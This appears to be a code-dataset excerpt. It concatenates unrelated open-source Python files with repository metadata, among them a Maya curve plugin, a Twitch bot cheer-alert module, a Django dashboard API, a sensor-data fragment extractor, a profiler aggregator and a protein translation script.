return OpenMayaMPx.asMPxPtr(closestPointOnCurve())
# initializer
def nodeInitializer():
tAttr = OpenMaya.MFnTypedAttribute()
nAttr = OpenMaya.MFnNumericAttribute()
# input curve
closestPointOnCurve.aInCurve = tAttr.create(
"inCurve", "ic", OpenMaya.MFnData.kNurbsCurve
)
tAttr.setStorable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInCurve)
# input position
closestPointOnCurve.aInPositionX = nAttr.create(
"inPositionX", "ipx", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(1)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInPositionX)
closestPointOnCurve.aInPositionY = nAttr.create(
"inPositionY", "ipy", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(1)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInPositionY)
closestPointOnCurve.aInPositionZ = nAttr.create(
"inPositionZ", "ipz", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(1)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInPositionZ)
closestPointOnCurve.aInPosition = nAttr.create(
"inPosition", "ip",
closestPointOnCurve.aInPositionX,
closestPointOnCurve.aInPositionY,
closestPointOnCurve.aInPositionZ
)
nAttr.setStorable(1)
nAttr.setKeyable(1)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInPosition)
# output position
closestPointOnCurve.aOutPositionX = nAttr.create(
"outPositionX", "opx", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutPositionX)
closestPointOnCurve.aOutPositionY = nAttr.create(
"outPositionY", "opy", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutPositionY)
closestPointOnCurve.aOutPositionZ = nAttr.create(
"outPositionZ", "opz", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutPositionZ)
closestPointOnCurve.aOutPosition = nAttr.create(
"outPosition", "op",
closestPointOnCurve.aOutPositionX,
closestPointOnCurve.aOutPositionY,
closestPointOnCurve.aOutPositionZ
)
nAttr.setStorable(0)
nAttr.setKeyable(0)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutPosition)
# output normal
closestPointOnCurve.aOutNormalX = nAttr.create(
"outNormalX", "onx", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutNormalX)
closestPointOnCurve.aOutNormalY = nAttr.create(
"outNormalY", "ony", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutNormalY)
closestPointOnCurve.aOutNormalZ = nAttr.create(
"outNormalZ", "onz", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutNormalZ)
closestPointOnCurve.aOutNormal = nAttr.create(
"outNormal", "on",
closestPointOnCurve.aOutNormalX,
closestPointOnCurve.aOutNormalY,
closestPointOnCurve.aOutNormalZ
)
nAttr.setStorable(0)
nAttr.setKeyable(0)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutNormal)
closestPointOnCurve.aOutParam = nAttr.create(
"outParam", "opa", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setKeyable(0)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutParam)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInCurve,
closestPointOnCurve.aOutPosition
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInPosition,
closestPointOnCurve.aOutPosition
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInCurve,
closestPointOnCurve.aOutParam
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInPosition,
closestPointOnCurve.aOutParam
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInCurve,
closestPointOnCurve.aOutNormal
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInPosition,
closestPointOnCurve.aOutNormal
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aOutParam,
closestPointOnCurve.aOutPosition
)
# initialize the script plug-in
def initializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject, "Erkan Ozgur Yilmaz","1.0.2")
try:
mplugin.registerNode(
kPluginNodeTypeName,
cpocPluginId,
nodeCreator,
nodeInitializer
)
except:
sys.stderr.write("Failed to register node: %s" % kPluginNodeTypeName)
raise
# uninitialize the script plug-in
def uninitializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject)
try:
mplugin.deregisterNode(cpocPluginId)
except:
sys.stderr.write("Failed to deregister node: %s" % kPluginNodeTypeName)
raise
|
bsd-2-clause
| -1,998,576,980,713,366,500
| 32.228464
| 93
| 0.679554
| false
| 3.486051
| false
| false
| false
|
appknox/vendor
|
ak_vendor/report_sample.py
|
1
|
1164
|
import json
from os.path import dirname, abspath
from django import template
from django.conf import settings
from django.template import Template, Context
from django.template.engine import Engine
from django.core.wsgi import get_wsgi_application
from ak_vendor.report import Report
settings.configure()
application = get_wsgi_application()
CUR_DIR = dirname(abspath(__file__))
template.Library()
class ReportHTMLExporter:
def __init__(self, report):
self.report = report
def to_html(self):
tpl = open('{}/report/report_template.html'.format(CUR_DIR)).read()
template = Template(tpl, engine=Engine(libraries={
'i18n': 'django.templatetags.i18n'
}))
context = Context({
'report': self.report
})
content = template.render(context)
return content
def to_html_file(self, path=''):
with open('{}/output.html'.format(path), 'w') as file:
tpl = self.to_html()
file.write(tpl)
data = json.load(open('{}/report_sample1.json'.format(CUR_DIR)))
report_obj = Report.from_json(data)
ReportHTMLExporter(report_obj).to_html_file(CUR_DIR)
|
mit
| 2,017,626,688,635,430,700
| 28.1
| 75
| 0.664089
| false
| 3.742765
| false
| false
| false
|
pajlada/pajbot
|
pajbot/modules/chat_alerts/cheeralert.py
|
1
|
12111
|
import logging
import math
from pajbot.managers.handler import HandlerManager
from pajbot.modules import BaseModule
from pajbot.modules import ModuleSetting
from pajbot.modules.chat_alerts import ChatAlertModule
log = logging.getLogger(__name__)
class CheerAlertModule(BaseModule):
ID = __name__.split(".")[-1]
NAME = "Cheer Alert"
DESCRIPTION = "Prints a message in chat/whispers when a user cheers in your chat"
CATEGORY = "Feature"
ENABLED_DEFAULT = False
PARENT_MODULE = ChatAlertModule
SETTINGS = [
ModuleSetting(
key="chat_message",
label="Enable chat messages for users who cheer bits",
type="boolean",
required=True,
default=True,
),
ModuleSetting(
key="whisper_message",
label="Enable whisper messages for users who cheer bits",
type="boolean",
required=True,
default=False,
),
ModuleSetting(
key="whisper_after",
label="Whisper the message after X seconds",
type="number",
required=True,
placeholder="",
default=5,
constraints={"min_value": 1, "max_value": 120},
),
ModuleSetting(
key="one_bit",
label="Chat message for users who cheer 1 or more bits | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="{username} thank you so much for cheering {num_bits} bits! PogChamp",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="sixnine_bits",
label="Chat message for users who cheer 69 bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! Kreygasm",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="hundred_bits",
label="Chat message for users who cheer 100 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="fourtwenty_bits",
label="Chat message for users who cheer 420 bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! CiGrip",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="fivehundred_bits",
label="Chat message for users who cheer 500 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="fifteenhundred_bits",
label="Chat message for users who cheer 1500 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="fivethousand_bits",
label="Chat message for users who cheer 5000 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="tenthousand_bits",
label="Chat message for users who cheer 10000 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="twentyfivethousand_bits",
label="Chat message for users who cheer 25000 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="grant_points_per_100_bits",
label="Give points to user per 100 bits they cheer. 0 = off",
type="number",
required=True,
placeholder="",
default=0,
constraints={"min_value": 0, "max_value": 50000},
),
ModuleSetting(
key="alert_message_points_given",
label="Message to announce points were given to user, leave empty to disable message. If the user cheers less than 100 bits, no message will be sent. | Available arguments: {username}, {points}, {num_bits}",
type="text",
required=True,
default="{username} was given {points} points for cheering {num_bits} bits! FeelsAmazingMan",
constraints={"max_str_len": 300},
),
]
def __init__(self, bot):
super().__init__(bot)
def on_cheer(self, user, num_bits):
"""
A user just cheered bits.
Send the event to the websocket manager, and send a customized message in chat.
"""
payload = {"username": user.name, "num_bits": num_bits}
self.bot.websocket_manager.emit("cheer", payload)
if self.settings["chat_message"]:
if num_bits >= 25000 and self.settings["twentyfivethousand_bits"] != "":
self.bot.say(self.get_phrase("twentyfivethousand_bits", **payload))
elif num_bits >= 10000 and self.settings["tenthousand_bits"] != "":
self.bot.say(self.get_phrase("tenthousand_bits", **payload))
elif num_bits >= 5000 and self.settings["fivethousand_bits"] != "":
self.bot.say(self.get_phrase("fivethousand_bits", **payload))
elif num_bits >= 1500 and self.settings["fifteenhundred_bits"] != "":
self.bot.say(self.get_phrase("fifteenhundred_bits", **payload))
elif num_bits >= 500 and self.settings["fivehundred_bits"] != "":
self.bot.say(self.get_phrase("fivehundred_bits", **payload))
elif num_bits == 420 and self.settings["fourtwenty_bits"] != "":
self.bot.say(self.get_phrase("fourtwenty_bits", **payload))
elif num_bits >= 100 and self.settings["hundred_bits"] != "":
self.bot.say(self.get_phrase("hundred_bits", **payload))
elif num_bits == 69 and self.settings["sixnine_bits"] != "":
self.bot.say(self.get_phrase("sixnine_bits", **payload))
elif self.settings["one_bit"] != "":
self.bot.say(self.get_phrase("one_bit", **payload))
if self.settings["whisper_message"]:
if num_bits >= 25000 and self.settings["twentyfivethousand_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("twentyfivethousand_bits", **payload),
)
elif num_bits >= 10000 and self.settings["tenthousand_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("tenthousand_bits", **payload),
)
elif num_bits >= 5000 and self.settings["fivethousand_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("fivethousand_bits", **payload),
)
elif num_bits >= 1500 and self.settings["fifteenhundred_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("fifteenhundred_bits", **payload),
)
elif num_bits >= 500 and self.settings["fivehundred_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("fivehundred_bits", **payload),
)
elif num_bits == 420 and self.settings["fourtwenty_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("fourtwenty_bits", **payload),
)
elif num_bits >= 100 and self.settings["hundred_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("hundred_bits", **payload),
)
elif num_bits == 69 and self.settings["sixnine_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("sixnine_bits", **payload),
)
elif self.settings["one_bit"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("one_bit", **payload),
)
if self.settings["grant_points_per_100_bits"] <= 0:
return
round_number = math.floor(num_bits / 100)
if round_number > 0:
points_to_grant = round_number * self.settings["grant_points_per_100_bits"]
user.points += points_to_grant
alert_message = self.settings["alert_message_points_given"]
if alert_message != "":
self.bot.say(alert_message.format(username=user, points=points_to_grant, num_bits=num_bits))
def on_pubmsg(self, source, tags, **rest):
if "bits" not in tags:
return
try:
num_bits = int(tags["bits"])
except ValueError:
log.error("BabyRage error occurred with getting the bits integer")
return
if "display-name" not in tags:
log.debug(f"cheeralert requires a display-name, but it is missing: {tags}")
return
self.on_cheer(source, num_bits)
def enable(self, bot):
HandlerManager.add_handler("on_pubmsg", self.on_pubmsg)
def disable(self, bot):
HandlerManager.remove_handler("on_pubmsg", self.on_pubmsg)
|
mit
| -5,770,239,708,818,410,000
| 43.690037
| 219
| 0.546033
| false
| 4.222803
| false
| false
| false
|
artemharutyunyan/copilot
|
src/copilot-dashboard/copilot_dashboard/dashboard/views.py
|
1
|
3545
|
import httplib2
import datetime
from urllib import urlencode
from random import random
from django.http import HttpRequest, HttpResponse
from django.core.serializers.json import DjangoJSONEncoder
from django.utils import simplejson
from django.conf import settings
import bson.json_util
from bson.objectid import ObjectId
import models as DB
from copilot_dashboard.settings import SETTINGS
HTTP = httplib2.Http("/tmp/httplib2-cache")
### Handlers ###
def ping(request):
"""
GET /api/ping
Responds with {"ping":"pong"} (HTTP 200) in case the system is working fine
Status codes:
* 200 - OK
"""
return json({'ping': 'pong'})
def stats(request):
"""
GET /api/stats?target={graphite path}[&from={start timestamp}&until={end timestamp}]
A simple Graphite proxy
Status codes:
* 200 - OK
* 400 - Missing query parameter
* 500 - No such data is available
"""
try:
path = request.GET['target']
except KeyError, e:
return json({'error': True}, 400)
start = request.GET.get('from', None)
end = request.GET.get('until', None)
data = mk_graphite_request(path, start, end)
return HttpResponse(data, mimetype="application/json")
def connections(request):
"""
GET /api/connections?from={start}[&allactive=true]
Lists all connected users in specified timeframe.
If 'allactive' is set to 'true', the timeframe will be ignored and instead
all currently connected users will be listed.
Response (JSON):
[
{"_id": "Document ID", "loc": [Longitude, Latitude]},
...
]
Status codes:
* 200 - OK
* 400 - Missing query parameter (from)
"""
collection = DB.get_collection('connections')
docs = []
query = None
if request.GET.get('allactive', 'false') == 'true':
query = {'connected': True, 'agent_data.component': 'agent'}
else:
try:
start = datetime.datetime.fromtimestamp(int(request.GET['from'])/1000)
except KeyError, e:
return json({'error': True}, 400)
query = {'updated_at': {'$gte': start}, 'agent_data.component': 'agent'}
for doc in collection.find(query, {'_id': 1, 'loc': 1}):
doc['loc'] = [coord + random()*0.0004 for coord in doc['loc']]
docs.append(doc)
return json(docs)
def connection_info(request, id):
"""
GET /api/connection/{connection id}
Responds with all data available for the specified connection (except for document's ID and coordinates).
Status codes:
* 200 - OK
* 404 - Given ID did not match any documents
"""
doc = DB.get_connection(id)
if not doc:
return json({'error': True}, 404)
else:
doc['contributions'] = DB.get_contributions(doc['agent_data']['id'])
return json(doc)
### Utilites ###
def mk_graphite_request(path, start, end):
global HTTP
query = {'target': path, 'format': 'json', '_salt': str(random)[2:]}
if start:
query['from'] = start
if end:
query['until'] = end
url = "http://%s:%s/render/?%s" % (SETTINGS['GRAPHITE_HOST'], SETTINGS['GRAPHITE_PORT'], urlencode(query))
headers, content = HTTP.request(url, "GET")
return content
class EnhancedJSONEncoder(DjangoJSONEncoder):
"""
Custom JSON encoder which can serialize MongoDB's ObjectId objects.
"""
def default(self, o, **kwargs):
if isinstance(o, ObjectId):
return str(o)
else:
return DjangoJSONEncoder.default(self, o, **kwargs)
def json(data, status=200):
data = simplejson.dumps(data, cls=EnhancedJSONEncoder, separators=(',', ':'))
return HttpResponse(data, mimetype='application/json', status=status)
|
bsd-3-clause
| 345,892,791,650,336,500
| 25.856061
| 108
| 0.667137
| false
| 3.643371
| false
| false
| false
|
petr-devaikin/dancee
|
helpers/extractor.py
|
1
|
5790
|
# Cut the experiment session in small fragments
# Input: ../bin/data/records/{session}/body.csv and skeletok.csv
# Output: fragments/{fragment_number}.json and fragments/log.csv
import os
import numpy
import json
DELAY = 15
LENGTH = 30
OVERLAP = 0.719999
FREQUENCY = 60
MARGIN = 5
FREQUENCY = 60
CUTOFF_FREQUENCY = 10
buf_length = FREQUENCY / CUTOFF_FREQUENCY
kernel = numpy.blackman(buf_length)
kernel_summ = numpy.sum(kernel)
to_filter = [
9, 10, 11, #r_shoulder
12, 13, 14, #r_elbow
15, 16, 17, #r_hand
18, 19, 20, #l_shoulder
21, 22, 23, #l_elbow
24, 25, 26, #l_hand
27, 28, 29, #r_hip
30, 31, 32, #r_knee
36, 37, 38, #r_foot
39, 40, 41, #l_hip
42, 43, 44, #l_knee
48, 49, 50 #l_foot
]
buffers = [[0] * buf_length] * len(to_filter)
values = [0] * len(to_filter)
values2 = [0] * len(to_filter)
# emg filtering
CUTOFF_EMG_FREQUENCY = 6
buf_emg_length = FREQUENCY / CUTOFF_EMG_FREQUENCY
kernel_emg = numpy.blackman(buf_emg_length)
kernel_emg_summ = numpy.sum(kernel_emg)
emg2_buffer = [0] * buf_emg_length
# acc filtering
CUTOFF_ACC_FREQUENCY = 10
buf_acc_length = FREQUENCY / CUTOFF_ACC_FREQUENCY
kernel_acc = numpy.blackman(buf_acc_length)
kernel_acc_summ = numpy.sum(kernel_acc)
acc_buffer = [[0] * buf_acc_length] * 3
# clean the folder
for f in os.listdir("fragments"):
os.remove(os.path.join('fragments', f))
# cut fragments
record_counter = 0
def cut_fragment(participant, track_number):
global record_counter
global values
global values2
global buffers
global emg2_buffer
global acc_buffer
print "Cut participant " + participant + ", track " + str(track_number)
result_data = {
'acc1': [],
'acc2': [],
'acc2_nf': [],
'emg1': [],
'emg2': [],
'emg2_nf': [],
'skeleton': [],
'skeleton_nf': [],
}
path = "../bin/data/records/"
for rec in os.listdir(path):
if rec.split(' ')[0] == participant:
with open(path + rec + "/body.csv", 'r') as f_read_body:
with open(path + rec + "/skeleton.csv", 'r') as f_read_skeleton:
i = 0
while i < (DELAY + (OVERLAP + LENGTH) * (track_number + 1) - MARGIN) * FREQUENCY:
line_body = f_read_body.readline().strip().split('\t')
line_skeleton = f_read_skeleton.readline().strip().split('\t')
values3 = [0] * len(to_filter)
if i >= (DELAY + OVERLAP + (OVERLAP + LENGTH) * track_number) * FREQUENCY:
values = [float(line_skeleton[j]) for j in to_filter]
for j in range(2, len(values), 3):
if values[j] > 1.4:
values2[j - 2] = values[j - 2]
values2[j - 1] = values[j - 1]
values2[j] = values[j]
for j in range(len(values)):
buffers[j].append(values2[j])
buffers[j] = buffers[j][1:]
for k in range(buf_length):
values3[j] += buffers[j][k] * kernel[k]
values3[j] /= kernel_summ
#emg filtering
emg2 = float(line_body[7])
emg2_nf = emg2
emg2_buffer.append(emg2)
emg2_buffer = emg2_buffer[1:]
emg2 = 0
for k in range(buf_emg_length):
emg2 += emg2_buffer[k] * kernel_emg[k]
emg2 /= kernel_emg_summ
line_body[7] = str(emg2)
#acc filtering
acc_values = [float(v) for v in line_body[3:6]]
for j in range(3):
v = float(line_body[3 + j])
acc_buffer[j].append(v)
acc_buffer[j] = acc_buffer[j][1:]
v2 = 0
for k in range(buf_acc_length):
v2 += acc_buffer[j][k] * kernel_acc[k]
v2 /= kernel_acc_summ
line_body[j + 3] = str(v2)
if i >= (DELAY + OVERLAP + (OVERLAP + LENGTH) * track_number + MARGIN) * FREQUENCY:
result_data['acc1'].append([float(v) - 512 for v in line_body[0:3]])
result_data['acc2'].append([float(v) - 512 for v in line_body[3:6]])
result_data['acc2_nf'].append(acc_values)
result_data['emg1'].append(float(line_body[6]))
result_data['emg2'].append(float(line_body[7]))
result_data['emg2_nf'].append(emg2_nf)
result_data['skeleton'].append({
'r_shoulder': values3[0:3],
'r_elbow': values3[3:6],
'r_hand': values3[6:9],
'l_shoulder': values3[9:12],
'l_elbow': values3[12:15],
'l_hand': values3[15:18],
'r_hip': values3[18:21],
'r_knee': values3[21:24],
'r_foot': values3[24:27],
'l_hip': values3[27:30],
'l_knee': values3[30:33],
'l_foot': values3[33:36]
})
result_data['skeleton_nf'].append({
'r_shoulder': values[0:3],
'r_elbow': values[3:6],
'r_hand': values[6:9],
'l_shoulder': values[9:12],
'l_elbow': values[12:15],
'l_hand': values[15:18],
'r_hip': values[18:21],
'r_knee': values[21:24],
'r_foot': values[24:27],
'l_hip': values[27:30],
'l_knee': values[30:33],
'l_foot': values[33:36]
})
i += 1
with open('fragments/' + str(record_counter) + '.json', "w") as f_write:
json.dump(result_data, f_write)
break
else:
print "Cannot find data for participant ", participant, "\n"
return None
record_counter += 1
return record_counter - 1
with open('selftest/results.txt', 'r') as f:
with open('fragments/log.csv', 'w') as log:
log.write('Participant\tTrack number\tTrack order\tValence\tArousal\tFragment\n')
participant = -1
track_number = 0
for line in f:
ar = line.strip().split(' ');
if ar[0] != participant:
track_number = 0
participant = ar[0]
track_real_number = ar[1]
valence = ar[2]
arousal = ar[3]
record = cut_fragment(participant, track_number)
log.write(participant + '\t' + track_real_number + '\t' + str(track_number) + '\t' + valence + '\t' + arousal + '\t' + str(record) + '\n')
track_number += 1
#break
|
gpl-3.0
| -8,201,075,262,819,803,000
| 25.199095
| 141
| 0.580656
| false
| 2.549538
| false
| false
| false
|
quantumgraph/qgprofiler
|
qgprofiler/qg_profile_aggregator.py
|
1
|
4240
|
from node import Node, NodeList
from .qg_profiler import QGProfiler
from .helper import get_real_file_path, get_file_type, xml_scanner, read_attributes_from_xml, merge_attributes
import glob
import json
class QGProfileAggregator(object):
def __init__(self, in_file_path, out_file_path):
self.root_node = Node('i_am_root', None, {})
self.in_file_path = get_real_file_path(in_file_path)
get_file_type(out_file_path)
self.out_file_path = get_real_file_path(out_file_path)
def add_json(self, _json):
new_node = self.make_node_from_json(_json, self.root_node)
new_node_list = NodeList()
new_node_list.append(new_node)
self.merge_node_list_to_node(self.root_node, new_node_list)
def merge_node_list_to_node(self, main_node, node_list):
for node in node_list:
index = main_node.is_child_in_children(node.get_name())
if index == -1:
main_node.add_child(node)
else:
existing_node = main_node.get_child(index)
existing_node.increment_value_by(node.get_value())
existing_node.increment_count_by(node.get_count())
existing_node.set_aggregate_attr(merge_attributes(node.get_aggregate_attr(), existing_node.get_aggregate_attr()))
existing_node.update_over_head(node.get_over_head())
self.merge_node_list_to_node(existing_node, node.get_children())
def make_node_from_json(self, _json, parent_node):
name = _json['name']
value = _json['value']
count = _json['count']
children = _json['children']
attributes = _json.get('attributes', {})
over_head = _json.get('overhead', 0)
new_node = Node(name, parent_node, attributes)
new_node.set_value(value)
new_node.set_count(count)
new_node.set_over_head(over_head)
for child in children:
child_node = self.make_node_from_json(child, new_node)
new_node.add_child(child_node)
return new_node
def add_xml(self, _xml):
current_node = self.root_node
xml_gen = xml_scanner(_xml)
for each in xml_gen:
if each[0] == 'START':
name = str(each[2]['name'])
value = float(each[2]['value'])
count = int(each[2]['count'])
over_head = float(each[2].get('overhead', 0))
attributes = read_attributes_from_xml(each[2].get('attributes', {}))
index = current_node.is_child_in_children(name)
if index == -1:
new_node = Node(name, current_node, attributes)
new_node.set_value(value)
new_node.set_count(count)
new_node.set_over_head(over_head)
current_node.add_child(new_node)
current_node = new_node
else:
current_node = current_node.get_child(index)
current_node.increment_value_by(value)
current_node.increment_count_by(count)
current_node.set_aggregate_attr(merge_attributes(attributes, current_node.get_aggregate_attr()))
current_node.update_over_head(over_head)
elif each[0] == 'END':
current_node = current_node.get_parent()
def generate_file(self, rounding_no=6):
for file_path in glob.iglob(self.in_file_path):
filename = file_path.split('/')[-1]
if filename.endswith('.json'):
with open(file_path, 'r') as f:
raw_json = f.read()
_json = json.loads(raw_json)
self.add_json(_json)
elif filename.endswith('.xml'):
with open(file_path, 'r') as f:
_xml = f.read()
self.add_xml(_xml)
qg_profiler = QGProfiler('test', self.out_file_path)
if len(self.root_node.get_children()) == 1:
qg_profiler.root_node = self.root_node.get_child(0)
else:
qg_profiler.root_node = self.root_node
qg_profiler.generate_file(rounding_no)
|
mit
| 7,139,093,304,680,659,000
| 43.631579
| 129
| 0.556132
| false
| 3.617747
| false
| false
| false
|
macmanes-lab/MCBS913
|
code/Junhong Chen/generateProtineSeq.py
|
1
|
4902
|
"""
Author: Junhong Chen
"""
from Bio.Alphabet import IUPAC
from Bio.Seq import Seq
from Bio import SeqIO
from sys import argv
import os
path = argv[1]
class CDS:
def __init__(self,gff):
self.data = dict()
self.fname = gff
def parse(self):
file = open(self.fname,"r")
for elem in file:
if "CDS" in elem:
tmp = elem.split()
ind = tmp.index("CDS")
if tmp[0] in self.data:
self.data[tmp[0]].append((int(tmp[ind+1]),int(tmp[ind+2]),tmp[ind+4]))
else:
self.data[tmp[0]] = [(int(tmp[ind+1]),int(tmp[ind+2]),tmp[ind+4])]
def getContigName(self):
return self.data.keys()
def getContigNumber(self):
return len(self.data)
def getContigCDSIndex(self,name):
if name in self.data:
return self.data[name]
else:
print "No indices for that contig ID: ", name
#return self.data[name.split(".")[0]]
def getContigCDSSize(self,name):
return len(self.getContigCDSIndex(name))
class RefSeq:
def __init__(self,fast):
self.fname = fast
self.data = dict()
self.result = dict()
self.cds = CDS(fast.split(".")[0]+".gff")
def parse(self):
fast = SeqIO.parse(open(self.fname),"fasta")
for elem in fast:
tmp = elem.id.split("|")[3]
if tmp in self.data:
print "ATTENTION: same contig ID in: " + self.fname
else:
self.data[tmp] = str(elem.seq)
def getContigSeq(self,name):
if name in self.data:
return self.data[name]
else:
print "Can NOT find the contig: "+name
def getContigData(self):
return self.data
def getContigID(self):
return self.data.keys()
def getContigCDSSize(self,name):
return self.cds.getContigCDSSize(name)
def translate(self,mode = IUPAC.ambiguous_dna):
self.cds.parse()
contig = self.data.keys()
for name in contig:
ind = self.cds.getContigCDSIndex(name)
sq = self.data[name]
ret = []
for tup in ind:
myseq = sq[tup[0]-1:tup[1]]
#store Seq Object
if tup[2] == "+":
ret.append(Seq(myseq, mode).translate())
else:
ret.append(Seq(myseq, mode).reverse_complement().translate())
self.result[name] = ret
return self.result
def getCDSSeq(self,name,index):
sq = self.data[name]
ind = self.cds.getContigCDSIndex(name)[index]
print self.cds.getContigName();
return sq[ind[0]-1:ind[1]]
def compareProtineSeq(path):
refd = RefSeq(path+".fastd")
refd.parse()
refa = RefSeq(path+".fasta")
refa.parse()
refat = refa.translate()
refdt = refd.translate()
#print refat["NC_008752.1"][3]
#print refdt["NC_008752.1"][3]
#print refa.getCDSSeq("NC_008752.1",3)
#print refd.getCDSSeq("NC_008752.1",3)
id = refd.getContigID()
ret = dict()
for name in id:
mis = []
l = refa.getContigCDSSize(name)
stat = 0
for i in range(l):
if refat[name][i] in refdt[name][i]:
stat = stat + 1
else:
mis.append(i)
ret[name] = (l,stat,mis)
def sum(x):
ret = 0.
for el in x:
ret = ret + el*1.
return ret
mis = [x[1] for x in ret.values()]
tot = [x[0] for x in ret.values()]
return sum(mis)/sum(tot)
#return ret
def getFilesinCWD(path):
if path[-1] is not "/":
path = path + "/"
ref = []
files = [f for f in os.listdir(path)]
for i in range(1,5):
for fo in files:
f = fo.split(".")[0]
if f not in ref and f.startswith(str(i)+"-"):
ref.append(f)
ret = [path+tp for tp in ref]
return ret
def doCompare(path):
fpath = getFilesinCWD(path)
retp = [f.split("/")[-1] for f in fpath]
ret = []
for p in fpath:
ret.append(compareProtineSeq(p))
return retp,ret
if __name__ == "__main__":
print doCompare(path)
##refa = RefSeq(path+".fasta")
#refa.parse()
#print refa.getCDSSeq("NC_008752",0)
|
mit
| -7,779,518,581,467,217,000
| 20.5
| 90
| 0.467768
| false
| 3.617712
| false
| false
| false
|
openre/openre
|
openre/agent/domain/__init__.py
|
1
|
1623
|
# -*- coding: utf-8 -*-
"""
Домен. Создает один процесс для одного домена openre. Получает и передает
спайки (pub), получает команды от сервера (req-rep) и пересылает результат
выполнения команды.
"""
from openre.agent.decorators import daemonize
from openre.agent.helpers import daemon_stop
import logging
import signal
from openre.agent.args import parse_args
from openre.agent.domain.args import parser
from openre.agent.domain.domain import Agent
def run():
args = parse_args(parser)
def sigterm(signum, frame):
signum_to_str = dict(
(k, v) for v, k in reversed(sorted(signal.__dict__.items()))
if v.startswith('SIG') and not v.startswith('SIG_')
)
logging.debug(
'Got signal.%s. Clean and exit.',
signum_to_str.get(signum, signum)
)
exit(0)
@daemonize(
args.pid_file,
